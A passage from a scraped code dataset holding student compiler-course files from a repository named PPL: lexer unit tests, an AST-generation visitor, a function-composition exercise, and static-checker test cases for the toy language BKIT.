\\\\b\\\\t\\\\r\\\\n\\\\f\\\\\\\\\\\\' '\",<EOF>\"\"\"\n num=182\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_bool_op(self):\n input=\"\"\"!&&||\"\"\"\n expect=\"\"\"!,&&,||,<EOF>\"\"\"\n num=183\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_int_op(self):\n input=\"\"\"+-*\\\\% ==!=<><=>=\"\"\"\n expect=\"\"\"+,-,*,\\\\,%,==,!=,<,>,<=,>=,<EOF>\"\"\"\n num=184\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_float_op(self):\n input=\"\"\"+.-.*.\\\\=/=<.>.<=.>=.\"\"\"\n expect=\"\"\"+.,-.,*.,\\\\,=/=,<.,>.,<=.,>=.,<EOF>\"\"\"\n num=185\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_lit_op_err_char(self):\n input=\"\"\"[1+1.\\\\2]@#\"\"\"\n expect=\"\"\"[,1,+,1.,\\\\,2,],ERROR_CHAR @\"\"\"\n num=186\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_url_str(self):\n input=\"\"\"\\\"http://e-learning.hcmut.edu.vn/course/view.php?id=66830\\\"\"\"\"\n expect=\"\"\"http://e-learning.hcmut.edu.vn/course/view.php?id=66830,<EOF>\"\"\"\n num=187\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_resolution_test(self):\n input=\"\"\"this.a.b.c\"\"\"\n expect=\"\"\"this,.,a,.,b,.,c,<EOF>\"\"\"\n num=188\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_illegal_id(self):\n input=\"\"\"IllegalID\"\"\"\n expect=\"\"\"ERROR_CHAR I\"\"\"\n num=189\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_tab_in_str(self):\n input=\"\"\"\\\"with tab\\t\\\"\"\"\"\n expect=\"\"\"UNCLOSE_STRING with tab\\t\"\"\"\n num=190\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_spec_composite(self):\n input=\"\"\"{{{}}}\"\"\"\n expect=\"\"\"{,{,{,},},},<EOF>\"\"\"\n num=191\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_composite_var_with_simple_expr(self):\n input=\"\"\"a[-12][0O1]\"\"\"\n expect=\"\"\"a,[,-,12,],[,0O1,],<EOF>\"\"\"\n num=192\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_unicode_char(self):\n input=\"\"\"U+007F\"\"\"\n expect=\"\"\"ERROR_CHAR U\"\"\"\n num=193\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_more_sign_in_scientific(self):\n input=\"\"\"12e+-1\"\"\"\n expect=\"\"\"12,e,+,-,1,<EOF>\"\"\"\n num=194\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_e_zero(self):\n input=\"\"\"000e000\"\"\"\n expect=\"\"\"000e000,<EOF>\"\"\"\n num=195\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_neg_scientific_float(self):\n input=\"\"\"12.0e-01\"\"\"\n expect=\"\"\"12.0e-01,<EOF>\"\"\"\n num=196\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_sequence_e(self):\n input=\"\"\"12000e-12-ex\"\"\"\n expect=\"\"\"12000e-12,-,ex,<EOF>\"\"\"\n num=197\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_ambigous_e(self):\n input=\"\"\"12e12e12.e1233e.e.e12\"\"\"\n expect=\"\"\"12e12,e12,.,e1233e,.,e,.,e12,<EOF>\"\"\"\n num=198\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_ambigous_hex_oct(self):\n input=\"\"\"-120x10o1o0xox012o0x12o30x1o3x012\"\"\"\n expect=\"\"\"-,120,x10o1o0xox012o0x12o30x1o3x012,<EOF>\"\"\"\n num=199\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_ambigous_float_int(self):\n input=\"\"\"12eX0e123e210x120o12E+12e-1231\"\"\"\n expect=\"\"\"12,eX0e123e210x120o12E,+,12e-1231,<EOF>\"\"\"\n num=200\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n" }, { "alpha_fraction": 0.6052431464195251, "alphanum_fraction": 0.6075227856636047, "avg_line_length": 35.0684928894043, "blob_id": "f2322b5a2010dbab5d849c2da07fc80c57caf701", "content_id": "979ca5c07bb4a20df7c70f6926ae25f99abe01c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2632, "license_type": "no_license", "max_line_length": 118, "num_lines": 73, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration3.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return self.visitExp(ctx.exp())\n\n# def visitExp(self,ctx:MPParser.ExpContext):\n# if ctx.ASSIGN():\n# return Binary(ctx.ASSIGN().getText(), self.visitTerm(ctx.term()), self.visitExp(ctx.exp()))\n# else:\n# return self.visitTerm(ctx.term())\n\n# def visitTerm(self,ctx:MPParser.TermContext):\n# if ctx.COMPARE():\n# return Binary(ctx.COMPARE().getText(), self.visitFactor(ctx.factor(0)), self.visitFactor(ctx.factor(1)))\n# else:\n# return self.visitFactor(ctx.factor(0))\n\n# def visitFactor(self,ctx:MPParser.FactorContext):\n# if ctx.ANDOR():\n# return Binary(ctx.ANDOR().getText(), self.visitFactor(ctx.factor()), self.visitOperand(ctx.operand()))\n# else:\n# return self.visitOperand(ctx.operand())\n\n# def visitOperand(self,ctx:MPParser.OperandContext):\n# if ctx.INTLIT():\n# return IntLiteral(int(ctx.INTLIT().getText()))\n\n# if ctx.BOOLIT():\n# return BoolLiteral(bool(ctx.BOOLIT().getText()))\n \n# if ctx.ID():\n# return Id(ctx.ID().getText())\n \n# return self.visitExp(ctx.exp())\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n return self.visitExp(ctx.exp())\n\n def visitExp(self,ctx:BKITParser.ExpContext):\n if ctx.ASSIGN():\n return Binary(ctx.ASSIGN().getText(), self.visitTerm(ctx.term()), self.visitExp(ctx.exp()))\n else:\n return self.visitTerm(ctx.term())\n\n def visitTerm(self,ctx:BKITParser.TermContext): \n if ctx.COMPARE():\n return Binary(ctx.COMPARE().getText(), self.visitFactor(ctx.factor(0)), self.visitFactor(ctx.factor(1)))\n else:\n return self.visitFactor(ctx.factor(0))\n\n def visitFactor(self,ctx:BKITParser.FactorContext):\n if ctx.ANDOR():\n return Binary(ctx.ANDOR().getText(), self.visitFactor(ctx.factor()), self.visitOperand(ctx.operand()))\n else:\n return self.visitOperand(ctx.operand())\n\n def visitOperand(self,ctx:BKITParser.OperandContext):\n if ctx.INTLIT():\n return IntLiteral(int(ctx.INTLIT().getText()))\n\n if ctx.BOOLIT():\n return BoolLiteral(bool(ctx.BOOLIT().getText()))\n \n if ctx.ID():\n return Id(ctx.ID().getText())\n \n return self.visitExp(ctx.exp())" }, { "alpha_fraction": 0.5865384340286255, "alphanum_fraction": 0.6195054650306702, "avg_line_length": 23.266666412353516, "blob_id": "936b1b65b9e4a452ea5d98b3ac36df6d18d645cd", "content_id": "589f01460e318ca70a73749359f5e6758c788db8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 728, "license_type": "no_license", "max_line_length": 85, "num_lines": 30, "path": "/FP/Question4.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "def double(x):\n return x * 2\n\ndef increase(x):\n return x + 1\n\ndef square(x):\n return x * x\n\n# def compose(x, *args):\n# return compose(compose(x, *args[1:]), args[0]) if len(args) > 1 else args[0](x)\n\ndef compose2(x, *args):\n from functools import reduce\n def compose(f, g):\n return lambda x : f(g(x))\n\n return reduce(compose, args)(x)\n\ndef compose(*funcs):\n def compose2func(f,g):\n return lambda x: f(g(x))\n from functools import reduce\n return reduce(lambda x,y: compose2func(x, y), funcs, lambda x: x)\n\n\nf = compose(increase, square, double) # 2*2 = 4, 4**2 = 16, 16 inc = 17\nprint(f(2))\n# print(compose(1, increase, square, double))\n# print(compose2(1, increase, square, double))\n" }, { "alpha_fraction": 0.4170035719871521, "alphanum_fraction": 0.44789838790893555, "avg_line_length": 24.767566680908203, "blob_id": "261afad741e94cdc04118b8094d1f18892b13909", "content_id": "a0c2894b6130b02898b68b66a6f880f19be0fcff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52436, "license_type": "no_license", "max_line_length": 176, "num_lines": 2035, "path": "/Assignments/assignment3/src/test/CheckSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestChecker\nfrom StaticError import *\nfrom AST import *\n# from AST_GEN_TEST import *\n\nclass CheckSuite(unittest.TestCase):\n\n def test_undeclared_function(self):\n \"\"\"Simple program: main\"\"\"\n input = \"\"\" Var: x,y=1;\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,400))\n\n def test_diff_numofparam_stmt(self):\n \"\"\"Complex program\"\"\"\n input = \"\"\"Function: main \n Body:\n printStrLn();\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"printStrLn\"),[])))\n self.assertTrue(TestChecker.test(input,expect,401))\n \n def test_diff_numofparam_expr(self):\n \"\"\"More complex program\"\"\"\n input = \"\"\"Function: main \n Body:\n printStrLn(read(4));\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"read\"),[IntLiteral(4)])))\n self.assertTrue(TestChecker.test(input,expect,402))\n \n\n def test_undeclared_function_use_ast(self):\n \"\"\"Simple program: main \"\"\"\n input = Program([FuncDecl(Id(\"main\"),[],([],[\n CallExpr(Id(\"foo\"),[])]))])\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,403))\n\n def test_diff_numofparam_expr_use_ast(self):\n \"\"\"More complex program\"\"\"\n input = Program([\n FuncDecl(Id(\"main\"),[],([],[\n CallStmt(Id(\"printStrLn\"),[\n CallExpr(Id(\"read\"),[IntLiteral(4)])\n ])]))])\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"read\"),[IntLiteral(4)])))\n self.assertTrue(TestChecker.test(input,expect,404))\n\n def test_diff_numofparam_stmt_use_ast(self):\n \"\"\"Complex program\"\"\"\n input = Program([\n FuncDecl(Id(\"main\"),[],([],[\n CallStmt(Id(\"printStrLn\"),[])]))])\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"printStrLn\"),[])))\n self.assertTrue(TestChecker.test(input,expect,405))\n\n def test_init_1(self):\n \"\"\"Simple program: main\"\"\"\n input = \"\"\" Var: x,y={};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(VarDecl(Id(\"y\"),[],ArrayLiteral([]))))\n self.assertTrue(TestChecker.test(input,expect,406))\n\n def test_init_2(self):\n \"\"\"Simple program: main\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(Undeclared(Function(), \"foo\"))\n self.assertTrue(TestChecker.test(input,expect,407))\n\n def test_init_3(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,{2}}};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(InvalidArrayLiteral(ArrayLiteral([IntLiteral(1),ArrayLiteral([IntLiteral(2)])])))\n self.assertTrue(TestChecker.test(input,expect,408))\n\n def test_init_4(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{{1},{2}}};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(InvalidArrayLiteral(ArrayLiteral([ArrayLiteral([IntLiteral(1)]),ArrayLiteral([IntLiteral(2)])])))\n self.assertTrue(TestChecker.test(input,expect,409))\n\n def test_init_5(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={1,1.2};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(InvalidArrayLiteral(ArrayLiteral([IntLiteral(1),FloatLiteral(1.2)])))\n self.assertTrue(TestChecker.test(input,expect,410))\n \n def test_func_decl(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Body:\n Return;\n EndBody.\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n self.assertTrue(TestChecker.test(input,expect,411))\n \n def test_no_entry_point(self):\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Body:\n Return;\n EndBody.\"\"\"\n expect = str(NoEntryPoint())\n self.assertTrue(TestChecker.test(input,expect,412))\n \n def test_func_decl_2(self):\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: main\n Parameter: x, y,x[1][2]\n Body:\n Return;\n EndBody.\"\"\"\n expect = str(Redeclared(Parameter(), \"x\"))\n self.assertTrue(TestChecker.test(input,expect,413))\n \n def test_func_decl_3(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Body:\n Return 1;\n EndBody.\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n \n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[])))\n self.assertTrue(TestChecker.test(input,expect,414))\n\n def test_func_decl_4(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[])))\n \n self.assertTrue(TestChecker.test(input,expect,415))\n \n def test_func_decl_5(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\n Function: main\n Body:\n x = 1. +. 2.;\n foo(x);\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),BinaryOp(\"\"\"+.\"\"\",FloatLiteral(1.0),FloatLiteral(2.0)))))\n \n self.assertTrue(TestChecker.test(input,expect,416))\n\n def test_func_decl_6(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1.2,y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\n Function: main\n Body:\n x = 1. +. 2.;\n foo(x);\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[Id(\"x\")])))\n \n self.assertTrue(TestChecker.test(input,expect,417))\n\n def test_func_decl_7(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return;\n EndBody.\n Function: main\n Body:\n foo(x);\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n \n self.assertTrue(TestChecker.test(input,expect,418))\n \n def test_func_decl_8(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1. + 2.;\n Return;\n EndBody.\n Function: main\n Body:\n foo(x);\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"+\"\"\",FloatLiteral(1.0),FloatLiteral(2.0))))\n \n self.assertTrue(TestChecker.test(input,expect,419))\n \n def test_func_decl_9(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1. +. 2.;\n Return;\n EndBody.\n Function: main\n Body:\n foo(x);\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[Id(\"x\")])))\n \n self.assertTrue(TestChecker.test(input,expect,420))\n\n def test_func_decl_10(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x;\n x = 1 + foo(x);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"x\"),BinaryOp(\"\"\"+\"\"\",IntLiteral(1),CallExpr(Id(\"foo\"),[Id(\"x\")])))))\n \n self.assertTrue(TestChecker.test(input,expect,421))\n \n def test_func_decl_11(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n self.assertTrue(TestChecker.test(input,expect,422))\n\n def test_func_decl_12(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,y);\n EndBody.\n Function: foo\n Parameter: x,a[1][2]\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n self.assertTrue(TestChecker.test(input,expect,423))\n \n def test_func_decl_13(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,y);\n EndBody.\n Function: foo\n Parameter: x,a[1][3]\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n self.assertTrue(TestChecker.test(input,expect,424))\n \n def test_undecl_var(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,y,z);\n EndBody.\n Function: foo\n Parameter: x,a[1][3]\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[Id(\"x\"),Id(\"y\"),Id(\"z\")])))\n self.assertTrue(TestChecker.test(input,expect,425))\n \n def test_call_expr(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,foo(x, True));\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),CallExpr(Id(\"foo\"),[Id(\"x\"),CallExpr(Id(\"foo\"),[Id(\"x\"),BooleanLiteral(True)])]))))\n\n self.assertTrue(TestChecker.test(input,expect,426))\n \n def test_call_expr_1(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,foo(x, 1));\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n\n self.assertTrue(TestChecker.test(input,expect,427))\n \n def test_call_expr_2(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Parameter: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(Undeclared(Function(), \"main\"))\n\n self.assertTrue(TestChecker.test(input,expect,428))\n \n def test_redecl_global(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Var: read;\n Function: main\n Parameter: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(Redeclared(Variable(), \"read\"))\n self.assertTrue(TestChecker.test(input,expect,429))\n \n def test_return_infunc(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n Return 1.1;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n self.assertTrue(TestChecker.test(input,expect,430))\n \n def test_return_in_while(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n While (y)\n Do\n Return 1.1;\n EndWhile.\n Return 1;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(IntLiteral(1))))\n\n self.assertTrue(TestChecker.test(input,expect,431))\n \n def test_return_global(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return y;\n EndBody.\"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,432))\n \n def test_return_index_expr(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3) + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,433))\n \n def test_return_index_expr_1(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3) + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1;\n EndBody.\"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,434))\n \n def test_return_index_expr_2(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3) + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,435))\n \n def test_return_index_expr_3(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3)[1][3] + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(Id(\"y\"))))\n \n self.assertTrue(TestChecker.test(input,expect,436))\n \n def test_return_index_expr_4(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3)[1][3] + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,437))\n \n def test_return_index_expr_5(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3)[1][3] + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,438))\n \n def test_for_loop(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n Var: i , x;\n For (i = 1, i <= x*x,i*i+.1.5)\n Do x=x+1;\n EndFor.\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"*\"\"\",Id(\"i\"),Id(\"i\")),FloatLiteral(1.5))))\n\n self.assertTrue(TestChecker.test(input,expect,439))\n \n def test_for_loop_1(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n Var: i , x;\n For (i = 1, i <= x*x,i*i+1)\n Do x=x+1;\n Return 1.1;\n EndFor.\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,440))\n \n def test_for_loop_2(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n Var: i , x;\n For (i = 1, i <= x*x,i*i+1)\n Do x=x+1;\n For (i = 1, i <= x*x,i*i+1)\n Do x=x+1;\n Return True;\n EndFor.\n Return 1.1;\n EndFor.\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,441))\n \n def test_return_type(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n x= 1+foo(1);\n foo(1);\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[IntLiteral(1)])))\n\n self.assertTrue(TestChecker.test(input,expect,442))\n \n def test_return_type_1(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n x= 1+foo(1);\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,443))\n \n def test_return_type_2(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n x= 1+foo(1);\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,444))\n \n def test_return_type_3(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n Var: i;\n For (i = 1, i <= x*x,i*i+1)\n Do x=x+1;\n If True Then\n Return True;\n EndIf.\n EndFor.\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 1 + main(x, y);\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),CallExpr(Id(\"main\"),[Id(\"x\"),Id(\"y\")]))))\n\n self.assertTrue(TestChecker.test(input,expect,445))\n \n def test_return_type_4(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n Var: i;\n x = 1;\n If x Then\n EndIf.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(If([(Id(\"x\"),[],[])],[])))\n\n self.assertTrue(TestChecker.test(input,expect,446))\n \n def test_return_type_5(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n For (x = 1, x>1 , 0.+.1.) Do\n EndFor.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = 